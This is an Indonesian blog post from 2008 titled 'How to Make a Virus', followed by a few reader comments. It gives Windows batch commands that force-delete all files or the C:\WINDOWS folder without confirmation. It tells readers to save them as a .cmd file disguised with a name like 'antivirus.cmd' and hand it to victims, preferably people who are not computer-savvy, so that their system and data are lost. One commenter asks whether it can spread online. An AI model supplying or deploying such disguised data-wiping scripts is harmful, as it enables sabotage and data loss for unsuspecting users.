Posted by: Fikrul Setiawan | 20 January 2008

Cara Membuat Virus

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:

Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI

Sumber: duniasexs.com


Responses

  1. salam, saya suka dengan ulasan dan gaya penulisan anda, edukatif dan sarat ilmu dunia komputer, semoga saya bisa mencontoh anda dalam memberikan pemikiran dan saran bagi sesama, semoga sukses selalu.
    @ smadav juni 2010.

  2. wah gila gan, hebat banget w udah coba tpi kira” virus ini bisa nyebar ke internet ga?

  3. gak bisaaaa delete aq udah cba


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: